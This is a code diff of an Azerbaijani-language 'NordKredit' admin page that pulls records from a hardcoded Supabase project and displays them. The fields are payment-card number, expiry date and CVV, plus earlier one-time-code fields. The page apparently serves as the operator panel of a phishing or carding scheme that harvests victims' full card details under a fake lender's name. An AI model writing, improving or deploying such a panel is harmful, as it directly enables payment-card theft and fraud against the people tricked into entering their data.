--- a/admin.html
+++ b/admin.html
@@ -3,73 +3,69 @@
 <head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
-<title>NordKredit Admin</title>
+<title>NordKredit Admin Panel</title>
 
 <style>
-body{background:#0f172a;color:white;font-family:sans-serif;padding:30px}
-h2{margin-bottom:20px}
-.stats{display:flex;gap:20px;margin-bottom:20px}
-.box{background:#1e293b;padding:20px;border-radius:15px}
-.card{background:#1e293b;padding:15px;margin-bottom:10px;border-radius:12px}
-button{margin-top:8px;padding:6px 10px;border:none;border-radius:8px;background:red;color:white;cursor:pointer}
+body{font-family:Arial;background:#111;color:white;padding:20px;}
+h2{margin-bottom:20px;}
+.card{background:#1e1e1e;padding:15px;margin-bottom:15px;border-radius:12px;}
+button{margin-top:10px;padding:8px 12px;border:none;border-radius:8px;background:red;color:white;cursor:pointer;}
 </style>
 </head>
 <body>
 
-<h2>NordKredit Admin Panel</h2>
-
-<div class="stats">
-<div class="box">Ümumi: <span id="total">0</span></div>
-<div class="box">Bu gün: <span id="today">0</span></div>
-</div>
-
+<h2>Gələn Məlumatlar</h2>
 <div id="list"></div>
 
 <script type="module">
 import { createClient } from "https://esm.sh/@supabase/supabase-js@2"
 
-const supabase=createClient(
-"https://gkrfcoyleewxrxbfdunq.supabase.co",
-"sb_publishable_E1QDjV9fAt2IaoI3h7G9Iw_hIiSaAFH"
+const supabase = createClient(
+  "https://gkrfcoyleewxrxbfdunq.supabase.co",
+  "sb_publishable_E1QDjV9fAt2IaoI3h7G9Iw_hIiSaAFH"
 )
 
-const list=document.getElementById("list")
+const list = document.getElementById("list")
 
-async function load(){
-const {data}=await supabase.from("nordkredit_data").select("*").order("id",{ascending:false})
-list.innerHTML=""
+async function loadData(){
+  list.innerHTML="Yüklənir..."
+  const { data, error } = await supabase
+    .from("mesajlar")
+    .select("*")
+    .order("id",{ascending:false})
 
-data.forEach(i=>{
-const div=document.createElement("div")
-div.className="card"
-div.innerHTML=`
-Kart: ${i.kart_nomresi}<br>
-Kod 4: ${i.kod_4}<br>
-Daxil edilən: ${i.daxil_edilen_3}<br>
-Tarix: ${new Date(i.created_at).toLocaleString()}<br>
-<button onclick="del(${i.id})">Sil</button>
-`
-list.appendChild(div)
-})
+  if(error){ list.innerHTML="Xəta: "+error.message; return }
 
-document.getElementById("total").textContent=data.length
+  list.innerHTML=""
 
-const today=new Date().toDateString()
-document.getElementById("today").textContent=
-data.filter(x=>new Date(x.created_at).toDateString()===today).length
+  data.forEach(item=>{
+    const div=document.createElement("div")
+    div.className="card"
+    div.innerHTML=`
+      <b>Kart:</b> ${item.kod1}<br>
+      <b>Tarix:</b> ${item.kod2}<br>
+      <b>CVV:</b> ${item.kod3}<br>
+      <button onclick="deleteItem(${item.id})">Sil</button>
+    `
+    list.appendChild(div)
+  })
 }
 
-window.del=async id=>{
-await supabase.from("nordkredit_data").delete().eq("id",id)
-load()
+window.deleteItem = async function(id){
+  await supabase.from("mesajlar").delete().eq("id",id)
+  loadData()
 }
 
-load()
+loadData()
 
-supabase.channel('realtime')
-.on('postgres_changes',{event:'*',schema:'public',table:'nordkredit_data'},()=>load())
-.subscribe()
-
+supabase
+  .channel('realtime')
+  .on('postgres_changes',
+    { event: '*', schema: 'public', table: 'mesajlar' },
+    () => loadData()
+  )
+  .subscribe()
 </script>
+
 </body>
 </html>
